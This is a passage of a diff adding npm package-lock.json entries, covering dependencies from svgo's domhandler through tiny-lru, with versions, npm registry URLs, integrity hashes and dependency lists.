"sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", + "dev": true, + "dependencies": { + "domelementtype": "^2.3.0" + }, + "engines": { + "node": ">= 4" + }, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/svgo/node_modules/domutils": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.1.0.tgz", + "integrity": "sha512-H78uMmQtI2AhgDJjWeQmHwJJ2bLPD3GMmO7Zja/ZZh84wkm+4ut+IUnUdRa8uCGX88DiVx1j6FRe1XfxEgjEZA==", + "dev": true, + "dependencies": { + "dom-serializer": "^2.0.0", + "domelementtype": "^2.3.0", + "domhandler": "^5.0.3" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/svgo/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dev": true, + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/swagger-client": { + "version": "3.18.4", + "resolved": "https://registry.npmjs.org/swagger-client/-/swagger-client-3.18.4.tgz", + "integrity": "sha512-Wj26oEctONq/u0uM+eSj18675YM5e2vFnx7Kr4neLeXEHKUsfceVQ/OdtrBXdrT3VbtdBbZfMTfl1JOBpix2MA==", + "dependencies": { + "@babel/runtime-corejs3": "^7.11.2", + "btoa": "^1.2.1", + "cookie": "~0.4.1", + "cross-fetch": "^3.1.5", + "deepmerge": "~4.2.2", + "fast-json-patch": "^3.0.0-1", + "form-data-encoder": "^1.4.3", + "formdata-node": "^4.0.0", + "is-plain-object": "^5.0.0", + "js-yaml": "^4.1.0", + "lodash": "^4.17.21", + "qs": "^6.10.2", + "traverse": "~0.6.6", + "url": "~0.11.0" + } + }, + "node_modules/swagger-client/node_modules/cookie": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz", + "integrity": "sha512-aSWTXFzaKWkvHO1Ny/s+ePFpvKsPnjc551iI41v3ny/ow6tBG5Vd+FuqGNhh1LxOmVzOlGUriIlOaokOvhaStA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/swagger-client/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/swagger-client/node_modules/punycode": { + "version": "1.3.2", + "resolved": 
"https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", + "integrity": "sha1-llOgNvt8HuQjQvIyXM7v6jkmxI0=" + }, + "node_modules/swagger-client/node_modules/traverse": { + "version": "0.6.6", + "resolved": "https://registry.npmjs.org/traverse/-/traverse-0.6.6.tgz", + "integrity": "sha1-y99WD9e5r2MlAv7UD5GMFX6pcTc=" + }, + "node_modules/swagger-client/node_modules/url": { + "version": "0.11.0", + "resolved": "https://registry.npmjs.org/url/-/url-0.11.0.tgz", + "integrity": "sha1-ODjpfPxgUh63PFJajlW/3Z4uKPE=", + "dependencies": { + "punycode": "1.3.2", + "querystring": "0.2.0" + } + }, + "node_modules/swagger-converter": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/swagger-converter/-/swagger-converter-0.1.7.tgz", + "integrity": "sha1-oJdRnG8e5N1n4wjZtT3cnCslf5c=", + "dependencies": { + "lodash.clonedeep": "^2.4.1" + } + }, + "node_modules/swagger-tools": { + "version": "0.10.4", + "resolved": "https://registry.npmjs.org/swagger-tools/-/swagger-tools-0.10.4.tgz", + "integrity": "sha512-VQpijIi8cpB/frUZOZlVpS7U3CrdSAZBfiHu448R1njiNXUnE7heF3Svz3qFBr5SYtaPvaqWpHMbvboirCXVzA==", + "license": "MIT", + "dependencies": { + "async": "^2.5.0", + "body-parser": "1.18.2", + "commander": "~2.11.0", + "debug": "^3.1.0", + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", + "multer": "^1.1.0", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", + "qs": "^6.0.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", + "swagger-converter": "^0.1.7", + "traverse": "^0.6.6", + "z-schema": "^3.15.4" + }, + "bin": { + "swagger-tools": "bin/swagger-tools" + } + }, + "node_modules/swagger-tools/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "license": "MIT", + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "node_modules/swagger-tools/node_modules/async": { + "version": "2.6.4", + "resolved": "https://registry.npmjs.org/async/-/async-2.6.4.tgz", + "integrity": "sha512-mzo5dfJYwAn29PeiJ0zvwTo04zj8HDJj0Mn8TD7sno7q12prdbnasKJHhkm2c1LgrhlJ0teaea8860oxi51mGA==", + "license": "MIT", + "dependencies": { + "lodash": "^4.17.14" + } + }, + "node_modules/swagger-tools/node_modules/commander": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.11.0.tgz", + "integrity": "sha512-b0553uYA5YAEGgyYIGYROzKQ7X5RAqedkfjiZxwi0kL1g3bOaBNNZfYkzt/CL0umgD5wc9Jec2FbB98CjkMRvQ==", + "license": "MIT" + }, + "node_modules/swagger-tools/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/swagger-tools/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "license": "MIT", + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/swagger-tools/node_modules/path-to-regexp": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-3.3.0.tgz", + "integrity": 
"sha512-qyCH421YQPS2WFDxDjftfc1ZR5WKQzVzqsp4n9M2kQhVOo/ByahFoUNJfl58kOcEGfQ//7weFTDhm+ss8Ecxgw==" + }, + "node_modules/symbol-tree": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/symbol-tree/-/symbol-tree-3.2.4.tgz", + "integrity": "sha512-9QNk5KwDF+Bvz+PyObkmSYjI5ksVUYtjW7AU22r2NKcfLJcXp96hkDWU3+XndOsUb+AQ9QhfzfCT2O+CNWT5Tw==", + "dev": true + }, + "node_modules/table": { + "version": "6.8.2", + "resolved": "https://registry.npmjs.org/table/-/table-6.8.2.tgz", + "integrity": "sha512-w2sfv80nrAh2VCbqR5AK27wswXhqcck2AhfnNW76beQXskGZ1V12GwS//yYVa3d3fcvAip2OUnbDAjW2k3v9fA==", + "dev": true, + "dependencies": { + "ajv": "^8.0.1", + "lodash.truncate": "^4.4.2", + "slice-ansi": "^4.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/table/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/table/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/tapable": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/tapable/-/tapable-2.2.1.tgz", + "integrity": "sha512-GNzQvQTOIP6RyTfE2Qxb8ZVlNmw0n88vp1szwWRimP02mnTsx3Wtn5qRdqY9w2XduFNUgvOwhNnQsjwCp+kqaQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/tar": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", + "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "dependencies": { + "chownr": "^2.0.0", + "fs-minipass": "^2.0.0", + "minipass": "^5.0.0", + "minizlib": "^2.1.1", + "mkdirp": "^1.0.3", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/tar-fs": { + "version": "3.0.8", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.8.tgz", + "integrity": "sha512-ZoROL70jptorGAlgAYiLoBLItEKw/fUxg9BSYK/dF/GAGYFJOJJJMvjPAKDJraCXFwadD456FCuvLWgfhMsPwg==", + "license": "MIT", + "dependencies": { + "pump": "^3.0.0", + "tar-stream": "^3.1.5" + }, + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" + } + }, + "node_modules/tar-fs/node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", + "dependencies": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" + } + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { 
+ "node": ">=6" + } + }, + "node_modules/tar/node_modules/chownr": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", + "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", + "engines": { + "node": ">=10" + } + }, + "node_modules/tar/node_modules/minipass": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", + "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/tar/node_modules/mkdirp": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "bin": { + "mkdirp": "bin/cmd.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/tar/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/tarn": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/tarn/-/tarn-3.0.2.tgz", + "integrity": "sha512-51LAVKUSZSVfI05vjPESNc5vwqqZpbXCsU+/+wxlOrUjk2SnFTt97v9ZgQrD4YmxYW1Px6w2KjaDitCfkvgxMQ==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/tdigest": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/tdigest/-/tdigest-0.1.1.tgz", + "integrity": "sha1-Ljyyw56kSeVdHmzZEReszKRYgCE=", + "dependencies": { + "bintrees": "1.0.1" + } + }, + "node_modules/teeny-request": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-7.1.3.tgz", + "integrity": "sha512-Ew3aoFzgQEatLA5OBIjdr1DWJUaC1xardG+qbPPo5k/y/3fMwXLxpjh5UB5dVfElktLaQbbMs80chkz53ByvSg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/teeny-request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/teex": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/teex/-/teex-1.0.1.tgz", + "integrity": "sha512-eYE6iEI62Ni1H8oIa7KlDU6uQBtqr4Eajni3wX7rpfXD8ysFx8z0+dri+KWEPWpBsxXfxu58x/0jvTVT1ekOSg==", + "dev": true, + "dependencies": { + "streamx": "^2.12.5" + } + }, + "node_modules/temp": { + "version": "0.8.4", + "resolved": "https://registry.npmjs.org/temp/-/temp-0.8.4.tgz", + "integrity": "sha512-s0ZZzd0BzYv5tLSptZooSjK8oj6C+c19p7Vqta9+6NPOf7r+fxq0cJe6/oN4LTC79sy5NY8ucOJNgwsKCSbfqg==", + "dependencies": { + "rimraf": "~2.6.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/temp/node_modules/rimraf": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz", + "integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/terser": { + "version": "5.31.3", + "resolved": "https://registry.npmjs.org/terser/-/terser-5.31.3.tgz", + "integrity": 
"sha512-pAfYn3NIZLyZpa83ZKigvj6Rn9c/vd5KfYGX7cN1mnzqgDcxWvrU5ZtAfIKhEXz9nRecw4z3LXkjaq96/qZqAA==", + "dev": true, + "dependencies": { + "@jridgewell/source-map": "^0.3.3", + "acorn": "^8.8.2", + "commander": "^2.20.0", + "source-map-support": "~0.5.20" + }, + "bin": { + "terser": "bin/terser" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/terser-webpack-plugin": { + "version": "5.3.12", + "resolved": "https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.12.tgz", + "integrity": "sha512-jDLYqo7oF8tJIttjXO6jBY5Hk8p3A8W4ttih7cCEq64fQFWmgJ4VqAQjKr7WwIDlmXKEc6QeoRb5ecjZ+2afcg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "jest-worker": "^27.4.5", + "schema-utils": "^4.3.0", + "serialize-javascript": "^6.0.2", + "terser": "^5.31.1" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + }, + "peerDependenciesMeta": { + "@swc/core": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "uglify-js": { + "optional": true + } + } + }, + "node_modules/terser-webpack-plugin/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/terser-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/terser-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/terser-webpack-plugin/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/terser/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/terser/node_modules/commander": { + "version": "2.20.3", + "resolved": 
"https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "dev": true + }, + "node_modules/test-exclude": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", + "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, + "dependencies": { + "@istanbuljs/schema": "^0.1.2", + "glob": "^7.1.4", + "minimatch": "^3.0.4" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", + "dependencies": { + "b4a": "^1.6.4" + } + }, + "node_modules/text-table": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", + "integrity": "sha1-f17oI66AUgfACvLfSoTsP8+lcLQ=" + }, + "node_modules/thenby": { + "version": "1.3.4", + "resolved": "https://registry.npmjs.org/thenby/-/thenby-1.3.4.tgz", + "integrity": "sha512-89Gi5raiWA3QZ4b2ePcEwswC3me9JIg+ToSgtE0JWeCynLnLxNr/f9G+xfo9K+Oj4AFdom8YNJjibIARTJmapQ==", + "dev": true + }, + "node_modules/thingies": { + "version": "1.21.0", + "resolved": "https://registry.npmjs.org/thingies/-/thingies-1.21.0.tgz", + "integrity": "sha512-hsqsJsFMsV+aD4s3CWKk85ep/3I9XzYV/IXaSouJMYIoDlgyi11cBhsqYe9/geRfB0YIikBQg6raRaM+nIMP9g==", + "dev": true, + "license": "Unlicense", + "engines": { + "node": ">=10.18" + }, + "peerDependencies": { + "tslib": "^2" + } + }, + "node_modules/thirty-two": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz", + "integrity": "sha1-TKL//AKlEpDSdEueP1V2k8prYno=", + "engines": { + "node": ">=0.2.6" + } + }, + "node_modules/thread-loader": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/thread-loader/-/thread-loader-4.0.2.tgz", + "integrity": "sha512-UOk/KBydsQjh4Ja5kocxDUzhv11KYptHN/h8gdSwo6/MBkYrWqQua6K2qwlpXnCXS9c/uLs8F/JF8rpveF0+fA==", + "dev": true, + "dependencies": { + "json-parse-better-errors": "^1.0.2", + "loader-runner": "^4.1.0", + "neo-async": "^2.6.2", + "schema-utils": "^4.0.1" + }, + "engines": { + "node": ">= 16.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/thread-loader/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/thread-loader/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/thread-loader/node_modules/json-schema-traverse": { + 
"version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/thread-loader/node_modules/schema-utils": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.2.0.tgz", + "integrity": "sha512-L0jRsrPpjdckP3oPug3/VxNKt2trR8TcabrM6FOAAlvC/9Phcmm+cuAgTlxBqdBR1WJx7Naj9WHw+aOmheSVbw==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/thriftrw": { + "version": "3.12.0", + "resolved": "https://registry.npmjs.org/thriftrw/-/thriftrw-3.12.0.tgz", + "integrity": "sha512-4YZvR4DPEI41n4Opwr4jmrLGG4hndxr7387kzRFIIzxHQjarPusH4lGXrugvgb7TtPrfZVTpZCVe44/xUxowEw==", + "dependencies": { + "bufrw": "^1.3.0", + "error": "7.0.2", + "long": "^2.4.0" + }, + "bin": { + "thrift2json": "thrift2json.js" + }, + "engines": { + "node": ">= 0.10.x" + } + }, + "node_modules/thriftrw/node_modules/long": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/long/-/long-2.4.0.tgz", + "integrity": "sha512-ijUtjmO/n2A5PaosNG9ZGDsQ3vxJg7ZW8vsY8Kp0f2yIZWhSJvjmegV7t+9RPQKxKrvj8yKGehhS+po14hPLGQ==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/throng": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/throng/-/throng-4.0.0.tgz", + "integrity": "sha1-mDxroZk7WOroWZmKpof/6I34TBc=", + "dependencies": { + "lodash.defaults": "^4.0.1" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/throttleit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/throttleit/-/throttleit-1.0.0.tgz", + "integrity": "sha1-nnhYNtr0Z0MUWlmEtiaNgoUorGw=", + "dev": true + }, + "node_modules/through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU=" + }, + "node_modules/through2": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/through2/-/through2-4.0.2.tgz", + "integrity": "sha512-iOqSav00cVxEEICeD7TjLB1sueEL+81Wpzp2bY17uZjZN0pWZPuo4suZ/61VujxmqSGFfgOcNuTZ85QJwNZQpw==", + "dev": true, + "dependencies": { + "readable-stream": "3" + } + }, + "node_modules/thunky": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/thunky/-/thunky-1.1.0.tgz", + "integrity": "sha512-eHY7nBftgThBqOyHGVN+l8gF0BucP09fMo0oO/Lb0w1OF80dJv+lDVpXG60WMQvkcxAkNybKsrEIE3ZtKGmPrA==", + "dev": true, + "license": "MIT" + }, + "node_modules/tildify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/tildify/-/tildify-2.0.0.tgz", + "integrity": "sha512-Cc+OraorugtXNfs50hU9KS369rFXCfgGLpfCfvlc+Ud5u6VWmUQsOAa9HbTvheQdYnrdJqqv1e5oIqXppMYnSw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/timekeeper": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/timekeeper/-/timekeeper-2.2.0.tgz", + "integrity": "sha512-W3AmPTJWZkRwu+iSNxPIsLZ2ByADsOLbbLxe46UJyWj3mlYLlwucKiq+/dPm0l9wTzqoF3/2PH0AGFCebjq23A==", + "dev": true + }, + "node_modules/timers-ext": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/timers-ext/-/timers-ext-0.1.7.tgz", + "integrity": "sha512-b85NUNzTSdodShTIbky6ZF02e8STtVVfD+fu4aXXShEELpozH+bCpJLYMPZbsABN2wDH7fJpqIoXxJpzbf0NqQ==", + "dev": 
true, + "dependencies": { + "es5-ext": "~0.10.46", + "next-tick": "1" + } + }, + "node_modules/tiny-async-pool": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/tiny-async-pool/-/tiny-async-pool-1.3.0.tgz", + "integrity": "sha512-01EAw5EDrcVrdgyCLgoSPvqznC0sVxDSVeiOz09FUpjh71G79VCqneOr+xvt7T1r76CF6ZZfPjHorN2+d+3mqA==", + "dependencies": { + "semver": "^5.5.0" + } + }, + "node_modules/tiny-async-pool/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/tiny-invariant": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz", + "integrity": "sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==", + "dev": true + }, + "node_modules/tiny-lru": { + "version": "8.0.2", + 